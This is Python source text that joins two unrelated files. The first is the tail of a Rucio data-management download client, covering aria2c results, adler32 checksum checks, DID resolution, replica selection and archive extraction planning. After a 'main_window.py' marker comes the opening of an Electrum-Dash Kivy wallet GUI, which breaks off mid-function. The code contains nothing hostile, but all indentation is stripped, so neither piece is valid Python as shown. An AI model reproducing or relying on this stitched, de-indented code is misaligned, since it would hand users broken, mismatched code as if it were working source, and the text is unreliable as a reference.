stopped = aria_rpc.aria2.tellStopped(rpc_auth, -1, num_stopped, ['gid', 'status', 'files'])
for dlinfo in stopped:
gid = dlinfo['gid']
item = gid_to_item[gid]
file_scope = item['scope']
file_name = item['name']
file_did_str = '%s:%s' % (file_scope, file_name)
temp_file_path = item['temp_file_path']
# workaround: only consider first dest file path for aria2c download
dest_file_path = next(iter(item['dest_file_paths']))
# ensure we didn't miss the active state (e.g. a very fast download)
start_time = item.setdefault('transferStart', time.time())
end_time = item.setdefault('transferEnd', time.time())
# get used pfn for traces
trace = item['trace']
for uri in dlinfo['files'][0]['uris']:
if uri['status'].lower() == 'used':
trace['remoteSite'] = pfn_to_rse.get(uri['uri'], '')
trace['transferStart'] = start_time
trace['transferEnd'] = end_time
# ensure file exists
status = dlinfo.get('status', '').lower()
if status == 'complete' and os.path.isfile(temp_file_path):
# checksum check
skip_check = item.get('ignore_checksum', False)
rucio_checksum = 0 if skip_check else item.get('adler32')
local_checksum = 0 if skip_check else adler32(temp_file_path)
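# the comparison below strips leading zeros so that adler32 values stored
# with and without zero padding are still considered equal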
if str(rucio_checksum).lstrip('0') == str(local_checksum).lstrip('0'):
item['clientState'] = 'DONE'
trace['clientState'] = 'DONE'
# remove .part ending
os.rename(temp_file_path, dest_file_path)
# calculate duration
duration = round(end_time - start_time, 2)
duration = max(duration, 0.01) # protect against 0 division
size = item.get('bytes', 0)
rate = round((size / duration) * 1e-6, 2)
size_str = sizefmt(size, self.is_human_readable)
logger(logging.INFO, 'File %s successfully downloaded. %s in %s seconds = %s MBps' % (file_did_str,
size_str,
duration,
rate))
else:
os.unlink(temp_file_path)
logger(logging.WARNING, 'Checksum validation failed for file: %s' % file_did_str)
logger(logging.DEBUG, 'Local checksum: %s, Rucio checksum: %s' % (local_checksum, rucio_checksum))
item['clientState'] = 'FAIL_VALIDATE'
trace['clientState'] = 'FAIL_VALIDATE'
else:
logger(logging.ERROR, 'Failed to download file: %s' % file_did_str)
logger(logging.DEBUG, 'Aria2c status: %s' % status)
item['clientState'] = 'FAILED'
trace['clientState'] = 'DOWNLOAD_ATTEMPT'
self._send_trace(trace)
del item['trace']
aria_rpc.aria2.removeDownloadResult(rpc_auth, gid)
del gid_to_item[gid]
if len(stopped) > 0:
logger(logging.INFO, 'Active: %d, Waiting: %d, Stopped: %d' % (num_active, num_waiting, num_stopped))
return items
def _resolve_one_item_dids(self, item):
"""
Resolve scopes or wildcard DIDs to lists of full did names:
:param item: One input item
"""
dids = item.get('did')
filters = item.get('filters', {})
if filters:
filters = copy.copy(filters)
if dids is None:
self.logger(logging.DEBUG, 'Resolving DIDs by using filter options')
scope = filters.pop('scope')
for did in self.client.list_dids(scope, filters=filters, did_type='all', long=True):
yield did
return
if not isinstance(dids, list):
dids = [dids]
for did_str in dids:
scope, did_name = self._split_did_str(did_str)
filters['name'] = did_name
any_did_resolved = False
for did in self.client.list_dids(scope, filters=filters, did_type='all', long=True):
yield did
any_did_resolved = True
# Maintain compatibility with existing code, which expects non-existing DIDs to be
# passed through in order to correctly set trace state to FILE_NOT_FOUND
if not any_did_resolved and '*' not in did_name:
yield {'scope': scope, 'name': did_name}
def _resolve_and_merge_input_items(self, input_items, sort=None):
"""
This function takes the input items given to download_dids etc.
and resolves the sources.
- It first performs a list_dids call to dereference any wildcards and
retrieve DID stats (size, length, type).
- Next, input items are grouped together by common list_replicas options.
For each group, a single list_replicas call is performed.
- The resolved File DIDs with sources are finally mapped back to initial
input items to be able to correctly retrieve download options
(timeout, destination directories, etc)
:param input_items: List of dictionaries. Each dictionary describing an input item
:returns: a tuple:
- a dictionary that maps the dereferenced(w/o wildcards) input DIDs to a list of input items
- and a list with a dictionary for each file DID which has to be downloaded
:raises InputValidationError: if one of the input items is in the wrong format
"""
logger = self.logger
# check mandatory options before doing any server calls
resolve_archives = False
for item in input_items:
if item.get('resolve_archives') is not None:
logger(logging.WARNING, 'resolve_archives option is deprecated and will be removed in a future release.')
item.setdefault('no_resolve_archives', not item.pop('resolve_archives'))
# If any item needs to resolve archives
if not item.get('no_resolve_archives'):
resolve_archives = True
if not item.get('did'):
if not item.get('filters', {}).get('scope'):
logger(logging.DEBUG, item)
raise InputValidationError('Item without did and filter/scope')
if resolve_archives:
# perhaps we'll need an extraction tool so check what is installed
self.extraction_tools = [tool for tool in self.extraction_tools if tool.is_useable()]
if len(self.extraction_tools) < 1:
logger(logging.WARNING, 'Archive resolution is enabled but no extraction tool is available. '
"Sources whose protocol doesn't support extraction won't be considered for download.")
# if excluding tapes, we need to list them first
tape_rses = []
if self.is_tape_excluded:
try:
tape_rses = [endp['rse'] for endp in self.client.list_rses(rse_expression='istape=true')]
except:
logger(logging.DEBUG, 'No tapes found.')
# Matches each dereferenced DID back to a list of input items
did_to_input_items = {}
# Resolve DIDs
for item in input_items:
resolved_dids = list(self._resolve_one_item_dids(item))
if not resolved_dids:
logger(logging.WARNING, "An item didn't have any DIDs after resolving the input: %s." % item.get('did', item))
item['dids'] = resolved_dids
for did in resolved_dids:
did_to_input_items.setdefault(DID(did), []).append(item)
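# list_dids may return a DID without its (dynamic) size; in that case fetch
# length and bytes explicitly from the server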
if 'length' in did and not did['length']:
did_with_size = self.client.get_did(scope=did['scope'], name=did['name'], dynamic=True)
did['length'] = did_with_size['length']
did['bytes'] = did_with_size['bytes']
# group input items by common options to reduce the number of calls to list_replicas
distinct_keys = ['rse', 'force_scheme', 'no_resolve_archives']
item_groups = []
for item in input_items:
found_compatible_group = False
if not item.get('nrandom'):
# Don't merge items if nrandom is set. Otherwise two items with the same nrandom will be merged into one
# and we'll effectively download only half of the desired replicas for each item.
for item_group in item_groups:
if all(item.get(k) == item_group[0].get(k) for k in distinct_keys):
item_group.append(item)
found_compatible_group = True
break
if not found_compatible_group:
item_groups.append([item])
# List replicas for dids
merged_items_with_sources = []
for item_group in item_groups:
# Take configuration from the first item in the group; but dids from all items
item = item_group[0]
input_dids = {DID(did): did
for item in item_group
for did in item.get('dids')}
# since we're using metalink we need to explicitly give all schemes
schemes = item.get('force_scheme')
if schemes:
schemes = schemes if isinstance(schemes, list) else [schemes]
logger(logging.DEBUG, 'schemes: %s' % schemes)
# RSE expression, still with tape endpoints included
rse_expression = item.get('rse')
logger(logging.DEBUG, 'rse_expression: %s' % rse_expression)
# obtaining the choice of Implementation
impl = item.get('impl')
if impl:
impl_split = impl.split('.')
if len(impl_split) == 1:
impl = 'rucio.rse.protocols.' + impl + '.Default'
else:
impl = 'rucio.rse.protocols.' + impl
logger(logging.DEBUG, 'impl: %s' % impl)
# get PFNs of files and datasets
logger(logging.DEBUG, 'num DIDs for list_replicas call: %d' % len(item['dids']))
nrandom = item.get('nrandom')
if nrandom:
logger(logging.INFO, 'Selecting %d random replicas from DID(s): %s' % (nrandom, [str(did) for did in input_dids]))
metalink_str = self.client.list_replicas([{'scope': did.scope, 'name': did.name} for did in input_dids],
schemes=schemes,
ignore_availability=False,
rse_expression=rse_expression,
client_location=self.client_location,
sort=sort,
resolve_archives=not item.get('no_resolve_archives'),
resolve_parents=True,
nrandom=nrandom,
metalink=True)
file_items = parse_replicas_from_string(metalink_str)
for file in file_items:
if impl:
file['impl'] = impl
elif not item.get('force_scheme'):
file['impl'] = self.preferred_impl(file['sources'])
logger(logging.DEBUG, 'num resolved files: %s' % len(file_items))
if not nrandom or nrandom != len(file_items):
# If list_replicas didn't resolve any file DIDs for any input did, we pass through the input DID.
# This is done to keep compatibility with later code which generates "FILE_NOT_FOUND" traces
# and output items.
# In the special case of nrandom, when serverside filtering is applied, it's "normal" for some input
# dids to be ignored as long as we got exactly nrandom file_items from the server.
for input_did in input_dids:
if not any([input_did == f['did'] or str(input_did) in f['parent_dids'] for f in file_items]):
logger(logging.ERROR, 'DID does not exist: %s' % input_did)
# TODO: store did directly as DIDType object
file_items.append({'did': str(input_did), 'adler32': None, 'md5': None, 'sources': [], 'parent_dids': set(), 'impl': impl or None})
# filtering out tape sources
if self.is_tape_excluded:
for file_item in file_items:
unfiltered_sources = copy.copy(file_item['sources'])
for src in unfiltered_sources:
if src['rse'] in tape_rses:
file_item['sources'].remove(src)
if unfiltered_sources and not file_item['sources']:
logger(logging.WARNING, 'The requested DID {} only has replicas on tape. Direct download from tape is prohibited. '
'Please request a transfer to a non-tape endpoint.'.format(file_item['did']))
# Match the file did back to the dids which were provided to list_replicas.
# Later, this will allow to match the file back to input_items via did_to_input_items
for file_item in file_items:
file_did = DID(file_item['did'])
file_input_dids = {DID(did) for did in file_item.get('parent_dids', [])}.intersection(input_dids)
if file_did in input_dids:
file_input_dids.add(file_did)
file_item['input_dids'] = {did: input_dids[did] for did in file_input_dids}
merged_items_with_sources.extend(file_items)
return did_to_input_items, merged_items_with_sources
def _options_from_input_items(self, input_items):
"""
Best-effort generation of download options from multiple input items which resolve to the same file DID.
This is done to download each file DID only once, even if it is requested multiple times via overlapping
datasets and/or wildcard resolutions in distinct input items.
Some options can be easily merged. For example: multiple base_dir are all appended to a list. As a result,
the file is downloaded once and copied to all desired destinations.
Other options are not necessarily compatible. For example, two items may request different values for the
download timeout. We do our best to merge the options in such cases.
"""
options = {}
for item in input_items:
base_dir = item.get('base_dir', '.')
no_subdir = item.get('no_subdir', False)
new_transfer_timeout = item.get('transfer_timeout', None)
new_transfer_speed_timeout = item.get('transfer_speed_timeout', None)
options.setdefault('destinations', set()).add((base_dir, no_subdir))
# Merge some options
# The other options of this DID will be inherited from the first item that contained the DID
options['ignore_checksum'] = options.get('ignore_checksum') or item.get('ignore_checksum', False)
options['check_local_with_filesize_only'] = options.get('check_local_with_filesize_only') or item.get('check_local_with_filesize_only', False)
# if one item wants to resolve archives we enable it for all items
options['resolve_archives'] = (options.get('resolve_archives') or not item.get('no_resolve_archives'))
cur_transfer_timeout = options.setdefault('transfer_timeout', None)
if cur_transfer_timeout is not None and new_transfer_timeout is not None:
options['transfer_timeout'] = max(int(cur_transfer_timeout), int(new_transfer_timeout))
elif new_transfer_timeout is not None:
options['transfer_timeout'] = int(new_transfer_timeout)
cur_transfer_speed_timeout = options.setdefault('transfer_speed_timeout', None)
if cur_transfer_speed_timeout is not None and new_transfer_speed_timeout is not None:
options['transfer_speed_timeout'] = min(float(cur_transfer_speed_timeout), float(new_transfer_speed_timeout))
elif new_transfer_speed_timeout is not None:
options['transfer_speed_timeout'] = float(new_transfer_speed_timeout)
return options
def _prepare_items_for_download(self, did_to_input_items, file_items):
"""
Optimises the amount of files to download
(This function is meant to be used as class internal only)
:param did_to_input_items: dictionary that maps resolved input DIDs to input items
:param file_items: list of dictionaries. Each dictionary describes a File DID to download
:returns: list of dictionaries. Each dictionary describes an element to download
:raises InputValidationError: if the given input is not valid or incomplete
"""
logger = self.logger
# maps file item IDs (fiid) to the file item object
fiid_to_file_item = {}
# cea -> client_extract archives to avoid confusion with archives that don't need explicit extraction
# this dict will contain all ids of cea's that definitely will be downloaded
cea_id_pure_to_fiids = {}
# this dict will contain ids of cea's that have higher prioritised non cea sources
cea_id_mixed_to_fiids = {}
all_dest_file_paths = set()
# get replicas for every file of the given dids
for file_item in file_items:
file_did = DID(file_item['did'])
input_items = list(itertools.chain.from_iterable(did_to_input_items.get(did, []) for did in file_item['input_dids']))
options = self._options_from_input_items(input_items)
file_item['scope'] = file_did.scope
file_item['name'] = file_did.name
logger(logging.DEBUG, 'Queueing file: %s' % file_did)
logger(logging.DEBUG, 'real parents: %s' % [str(did) for did in file_item['input_dids'] if did != file_did])
logger(logging.DEBUG, 'options: %s' % options)
# prepare destinations folders:
dest_file_paths = file_item.get('dest_file_paths', set())
for input_did in file_item['input_dids']:
for item in did_to_input_items[input_did]:
base_dir = item.get('base_dir', '.')
no_subdir = item.get('no_subdir', False)
file_did_path = file_did.name
if input_did != file_did:
# if datasets were given: prepare the destination paths for each dataset
if self.extract_scope_convention == 'belleii' and file_did_path.startswith('/'):
file_did_path = file_did_path.split('/')[-1]
path = os.path.join(self._prepare_dest_dir(base_dir, input_did.name, no_subdir), file_did_path)
else:
# if no datasets were given only prepare the given destination paths
if file_did_path.startswith('/'):
file_did_path = file_did_path[1:]
path = os.path.join(self._prepare_dest_dir(base_dir, file_did.scope, no_subdir), file_did_path)
if path in all_dest_file_paths:
raise RucioException("Multiple file items with same destination file path")
all_dest_file_paths.add(path)
dest_file_paths.add(path)
# workaround: just take any given dataset for the traces and the output
file_item.setdefault('dataset_scope', input_did.scope)
file_item.setdefault('dataset_name', input_did.name)
if not options:
continue
resolve_archives = options.get('resolve_archives')
file_item['merged_options'] = options
file_item['dest_file_paths'] = list(dest_file_paths)
file_item['temp_file_path'] = '%s.part' % file_item['dest_file_paths'][0]
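# the transfer first goes to this '.part' temp file and is only renamed to the
# final destination path(s) after the download (and checksum check) succeeded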
# the file DID str is not a unique key for this dict because multiple calls of list_replicas
# could result in the same DID multiple times. So we're using the id of the dictionary objects
fiid = id(file_item)
fiid_to_file_item[fiid] = file_item
if resolve_archives:
min_cea_priority = None
num_non_cea_sources = 0
cea_ids = []
sources = []
# go through sources and check how many (non-)cea sources there are,
# index cea sources, or remove cea sources if there is no extraction tool
for source in file_item['sources']:
is_cea = source.get('client_extract', False)
if is_cea and (len(self.extraction_tools) > 0):
priority = int(source['priority'])
if min_cea_priority is None or priority < min_cea_priority:
min_cea_priority = priority
# workaround: since we don't have the archive DID, use the part behind the last slash of the PFN
# this doesn't respect the scope of the archive DID!!!
# and we trust that client_extract==True sources don't have any parameters at the end of the PFN
cea_id = source['pfn'].split('/')
cea_id = cea_id[-1] if len(cea_id[-1]) > 0 else cea_id[-2]
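# if the PFN ends with a slash the last path component is empty, so fall back
# to the second-to-last component as the archive identifier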
cea_ids.append(cea_id)
sources.append(source)
elif not is_cea:
num_non_cea_sources += 1
sources.append(source)
else:
# no extraction tool
logger(logging.DEBUG, 'client_extract=True; ignoring source: %s' % source['pfn'])
logger(logging.DEBUG, 'Prepared sources: num_sources=%d/%d; num_non_cea_sources=%d; num_cea_ids=%d'
% (len(sources), len(file_item['sources']), num_non_cea_sources, len(cea_ids)))
file_item['sources'] = sources
# if there are no cea sources we are done for this item
if min_cea_priority is None:
continue
# decide if file item belongs to the pure or mixed map
# if no non-archive src exists or the highest prio src is an archive src we put it in the pure map
elif num_non_cea_sources == 0 or min_cea_priority == 1:
logger(logging.DEBUG, 'Adding fiid to cea pure map: '
'num_non_cea_sources=%d; min_cea_priority=%d; num_cea_sources=%d'
% (num_non_cea_sources, min_cea_priority, len(cea_ids)))
for cea_id in cea_ids:
cea_id_pure_to_fiids.setdefault(cea_id, set()).add(fiid)
file_item.setdefault('cea_ids_pure', set()).add(cea_id)
# if there are non-archive sources and archive sources we put it in the mixed map
elif len(cea_ids) > 0:
logger(logging.DEBUG, 'Adding fiid to cea mixed map: '
'num_non_cea_sources=%d; min_cea_priority=%d; num_cea_sources=%d'
% (num_non_cea_sources, min_cea_priority, len(cea_ids)))
for cea_id in cea_ids:
cea_id_mixed_to_fiids.setdefault(cea_id, set()).add(fiid)
file_item.setdefault('cea_ids_mixed', set()).add(cea_id)
# put all archives from the mixed list into the pure list if they meet
# certain conditions, e.g., an archive that is already in the pure list
for cea_id_mixed in list(cea_id_mixed_to_fiids.keys()):
fiids_mixed = cea_id_mixed_to_fiids[cea_id_mixed]
if cea_id_mixed in cea_id_pure_to_fiids:
# file from mixed list is already in a pure list
logger(logging.DEBUG, 'Mixed ID is already in cea pure map: '
'cea_id_mixed=%s; num_fiids_mixed=%d; num_cea_pure_fiids=%d'
% (cea_id_mixed, len(fiids_mixed), len(cea_id_pure_to_fiids[cea_id_mixed])))
elif len(fiids_mixed) >= self.use_cea_threshold:
# more than use_cea_threshold files are in a common archive
logger(logging.DEBUG, 'Number of needed files in cea reached threshold: '
'cea_id_mixed=%s; num_fiids_mixed=%d; threshold=%d'
% (cea_id_mixed, len(fiids_mixed), self.use_cea_threshold))
else:
# don't move from mixed list to pure list
continue
# first add cea_id to pure map so it can be removed from mixed map later
cea_id_pure_to_fiids.setdefault(cea_id_mixed, set()).update(fiids_mixed)
# now update all file_item mixed/pure maps
for fiid_mixed in list(fiids_mixed):
file_item = fiid_to_file_item[fiid_mixed]
# add cea id to file_item pure map
file_item.setdefault('cea_ids_pure', set()).add(cea_id_mixed)
# remove file item mixed map and
# remove references from all other mixed archives to file_item
for cea_id_mixed2 in file_item.pop('cea_ids_mixed'):
cea_id_mixed_to_fiids[cea_id_mixed2].remove(fiid_mixed)
# finally remove cea_id from mixed map
cea_id_mixed_to_fiids.pop(cea_id_mixed)
for file_item in file_items:
cea_ids_pure = file_item.get('cea_ids_pure', set())
cea_ids_mixed = file_item.get('cea_ids_mixed', set())
if len(cea_ids_pure) > 0:
logger(logging.DEBUG, 'Removing all non-cea sources of file %s' % file_item['did'])
file_item['sources'] = [s for s in file_item['sources'] if s.get('client_extract', False)]
elif len(cea_ids_mixed) > 0:
logger(logging.DEBUG, 'Removing all cea sources of file %s' % file_item['did'])
file_item['sources'] = [s for s in file_item['sources'] if not s.get('client_extract', False)]
# reduce the amount of archives to download by removing
# all redundant pure archives (=all files can be extracted from other archives)
for cea_id_pure in list(cea_id_pure_to_fiids.keys()):
# if all files of this archive are available in more than one archive the archive is redundant
if all(len(fiid_to_file_item[fiid_pure]['cea_ids_pure']) > 1 for fiid_pure in cea_id_pure_to_fiids[cea_id_pure]):
for fiid_pure in cea_id_pure_to_fiids[cea_id_pure]:
fiid_to_file_item[fiid_pure]['cea_ids_pure'].discard(cea_id_pure)
logger(logging.DEBUG, 'Removing redundant archive %s' % cea_id_pure)
cea_id_pure_to_fiids.pop(cea_id_pure)
# remove all archives of a file except a single one so
# that each file is assigned to exactly one pure archive
for cea_id_pure in cea_id_pure_to_fiids:
for fiid_pure in cea_id_pure_to_fiids[cea_id_pure]:
cea_ids_pure = fiid_to_file_item[fiid_pure]['cea_ids_pure']
for cea_id_pure_other in list(cea_ids_pure):
if cea_id_pure != cea_id_pure_other:
cea_id_pure_to_fiids[cea_id_pure_other].discard(fiid_pure)
cea_ids_pure.discard(cea_id_pure_other)
download_packs = []
cea_id_to_pack = {}
for file_item in file_items:
cea_ids = file_item.get('cea_ids_pure', set())
if len(cea_ids) > 0:
cea_id = next(iter(cea_ids))
pack = cea_id_to_pack.get(cea_id)
if pack is None:
scope = file_item['scope']
first_dest = next(iter(file_item['merged_options']['destinations']))
dest_path = os.path.join(self._prepare_dest_dir(first_dest[0], scope, first_dest[1]), cea_id)
pack = {'scope': scope,
'name': cea_id,
'dest_file_paths': [dest_path],
'temp_file_path': '%s.part' % dest_path,
'sources': file_item['sources'],
'merged_options': {'ignore_checksum': True}, # we currently don't have checksums for the archive
'archive_items': []
}
cea_id_to_pack[cea_id] = pack
download_packs.append(pack)
file_item.pop('sources')
pack['archive_items'].append(file_item)
else:
download_packs.append(file_item)
return download_packs
def _split_did_str(self, did_str):
"""
Splits a given DID string (e.g. 'scope1:name.file') into its scope and name part
(This function is meant to be used as class internal only)
:param did_str: the DID string that will be split
:returns: the scope and name parts of the given DID
:raises InputValidationError: if the given DID string is not valid
"""
did = did_str.split(':')
if len(did) == 2:
did_scope = did[0]
did_name = did[1]
elif len(did) == 1:
if self.extract_scope_convention == 'belleii':
scopes = [scope for scope in self.client.list_scopes()]
did_scope, did_name = extract_scope(did[0], scopes)
else:
did = did_str.split('.')
did_scope = did[0]
if did_scope == 'user' or did_scope == 'group':
did_scope = '%s.%s' % (did[0], did[1])
did_name = did_str
else:
raise InputValidationError('%s is not a valid DID. Too many colons.' % did_str)
if did_name.endswith('/'):
did_name = did_name[:-1]
return did_scope, did_name
def _prepare_dest_dir(self, base_dir, dest_dir_name, no_subdir):
"""
Builds the final destination path for a file and creates the
destination directory if it's not existent.
(This function is meant to be used as class internal only)
:param base_dir: base directory part
:param dest_dir_name: name of the destination directory
:param no_subdir: if no subdirectory should be created
:returns: the absolute path of the destination directory
"""
# append dest_dir_name, if subdir should be used
if dest_dir_name.startswith('/'):
dest_dir_name = dest_dir_name[1:]
dest_dir_path = os.path.join(os.path.abspath(base_dir), '' if no_subdir else dest_dir_name)
if not os.path.isdir(dest_dir_path):
os.makedirs(dest_dir_path)
return dest_dir_path
def _check_output(self, output_items, deactivate_file_download_exceptions=False):
"""
Checks if all files were successfully downloaded
(This function is meant to be used as class internal only)
:param output_items: list of dictionaries describing the downloaded files
:param deactivate_file_download_exceptions: Boolean, if file download exceptions shouldn't be raised
:returns: output_items list
:raises NoFilesDownloaded:
:raises NotAllFilesDownloaded:
"""
success_states = ['ALREADY_DONE', 'DONE', 'FOUND_IN_PCACHE']
# failure_states = ['FILE_NOT_FOUND', 'FAIL_VALIDATE', 'FAILED']
num_successful = 0
num_failed = 0
for item in output_items:
clientState = item.get('clientState', 'FAILED')
if clientState in success_states:
num_successful += 1
else:
num_failed += 1
if not deactivate_file_download_exceptions and num_successful == 0:
raise NoFilesDownloaded()
elif not deactivate_file_download_exceptions and num_failed > 0:
raise NotAllFilesDownloaded()
return output_items
def _send_trace(self, trace):
"""
Checks if sending traces is allowed and sends the trace.
:param trace: the trace
"""
if self.tracing:
send_trace(trace, self.client.trace_host, self.client.user_agent)
def preferred_impl(self, sources):
"""
Finds the optimum protocol impl preferred by the client and
supported by the remote RSE.
:param sources: List of sources for a given DID
:raises RucioException(msg): general exception with msg for more details.
"""
preferred_protocols = []
checked_rses = []
supported_impl = None
try:
preferred_impls = config_get('download', 'preferred_impl')
except Exception as error:
self.logger(logging.INFO, 'No preferred protocol impl in rucio.cfg: %s' % (error))
return supported_impl
else:
preferred_impls = list(preferred_impls.split(', '))
i = 0
while i < len(preferred_impls):
impl = preferred_impls[i]
impl_split = impl.split('.')
if len(impl_split) == 1:
preferred_impls[i] = 'rucio.rse.protocols.' + impl + '.Default'
else:
preferred_impls[i] = 'rucio.rse.protocols.' + impl
i += 1
for source in sources:
if source['rse'] in checked_rses:
continue
try:
rse_settings = rsemgr.get_rse_info(source['rse'], vo=self.client.vo)
checked_rses.append(str(source['rse']))
except RucioException as error:
self.logger(logging.DEBUG, 'Could not get info of RSE %s: %s' % (source['rse'], error))
continue
preferred_protocols = [protocol for protocol in reversed(rse_settings['protocols']) if protocol['impl'] in preferred_impls]
if len(preferred_protocols) == 0:
continue
for protocol in preferred_protocols:
if not protocol['domains']['wan'].get("read"):
self.logger(logging.WARNING, 'Unsuitable protocol "%s": "WAN Read" operation is not supported' % (protocol['impl']))
continue
try:
supported_protocol = rsemgr.create_protocol(rse_settings, 'read', impl=protocol['impl'], auth_token=self.auth_token, logger=self.logger)
supported_protocol.connect()
except Exception as error:
self.logger(logging.WARNING, 'Failed to create protocol "%s", exception: %s' % (protocol['impl'], error))
pass
else:
self.logger(logging.INFO, 'Preferred protocol impl supported locally and remotely: %s' % (protocol['impl']))
supported_impl = protocol['impl']
break
return supported_impl
def _verify_checksum(item, path):
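# prefer the PREFERRED_CHECKSUM algorithm; if the item does not carry it, fall
# back to any other globally supported checksum available for the file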
rucio_checksum = item.get(PREFERRED_CHECKSUM)
local_checksum = None
checksum_algo = CHECKSUM_ALGO_DICT.get(PREFERRED_CHECKSUM)
if rucio_checksum and checksum_algo:
local_checksum = checksum_algo(path)
return rucio_checksum == local_checksum, rucio_checksum, local_checksum
for checksum_name in GLOBALLY_SUPPORTED_CHECKSUMS:
rucio_checksum = item.get(checksum_name)
checksum_algo = CHECKSUM_ALGO_DICT.get(checksum_name)
if rucio_checksum and checksum_algo:
local_checksum = checksum_algo(path)
return rucio_checksum == local_checksum, rucio_checksum, local_checksum
return False, None, None
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum_dash.dash_ps_util import (PSPossibleDoubleSpendError,
PSSpendToPSAddressesError)
from electrum_dash.storage import WalletStorage, StorageReadWriteError
from electrum_dash.wallet_db import WalletDB
from electrum_dash.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum_dash.wallet import update_password_for_directory
from electrum_dash.plugin import run_hook
from electrum_dash import util
from electrum_dash.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis)
from electrum_dash.invoices import PR_PAID, PR_FAILED
from electrum_dash import blockchain
from electrum_dash.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum_dash.interface import PREFERRED_NETWORK_PROTOCOL, ServerAddr
from electrum_dash.logging import Logger
from electrum_dash.gui import messages
from .i18n import _
from . import KIVY_GUI_PATH
from kivy.app import App
from kivy.core.window import Window
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import OpenWalletDialog, ChangePasswordDialog, PincodeDialog, PasswordDialog
from .uix.dialogs.choice_dialog import ChoiceDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_dash.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_dash.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_dash.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_dash.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
from .uix.dialogs.dash_kivy import TorWarnDialog
from .uix.dialogs.warn_dialog import WarnDialog
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
# register widget cache to keep memory usage down; timeout=0 means the
# cached data is kept forever
Cache.register('electrum_dash_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_dash.gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register(
'Roboto',
KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
)
from electrum_dash.util import (NoDynamicFeeEstimates, NotEnoughFunds,
DASH_BIP21_URI_SCHEME, PAY_BIP21_URI_SCHEME,
UserFacingException)
if TYPE_CHECKING:
from . import ElectrumGui
from electrum_dash.simple_config import SimpleConfig
from electrum_dash.plugin import Plugins
from electrum_dash.paymentrequest import PaymentRequest
ATLAS_ICON = f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/%s'
class ElectrumWindow(App, Logger):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
tor_auto_on_bp = BooleanProperty()
def toggle_tor_auto_on(self, x):
self.tor_auto_on_bp = not self.electrum_config.get('tor_auto_on', True)
self.electrum_config.set_key('tor_auto_on', self.tor_auto_on_bp, True)
fiat_bypass_tor_bp = BooleanProperty()
def toggle_fiat_bypass_tor(self, x):
self.fiat_bypass_tor_bp = \
not self.electrum_config.get('fiat_bypass_tor', False)
self.electrum_config.set_key('fiat_bypass_tor',
self.fiat_bypass_tor_bp, True)
coro = self.network.restart()
self.network.run_from_another_thread(coro)
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
protocol = PREFERRED_NETWORK_PROTOCOL
def cb2(server_str):
popup.ids.server_str.text = server_str
servers = self.network.get_servers()
server_choices = {}
for _host, d in sorted(servers.items()):
port = d.get(protocol)
if port:
server = ServerAddr(_host, port, protocol=protocol)
server_choices[server.net_addr_str()] = _host
ChoiceDialog(_('Choose a server'), server_choices, popup.ids.server_str.text, cb2).open()
def maybe_switch_to_server(self, server_str: str):
net_params = self.network.get_parameters()
try:
server = ServerAddr.from_str_with_inference(server_str)
if not server: raise Exception("failed to parse")
except Exception as e:
self.show_error(_("Invalid server details: {}").format(repr(e)))
return
net_params = net_params._replace(server=server)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def choose_blockchain_dialog(self, dt):
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
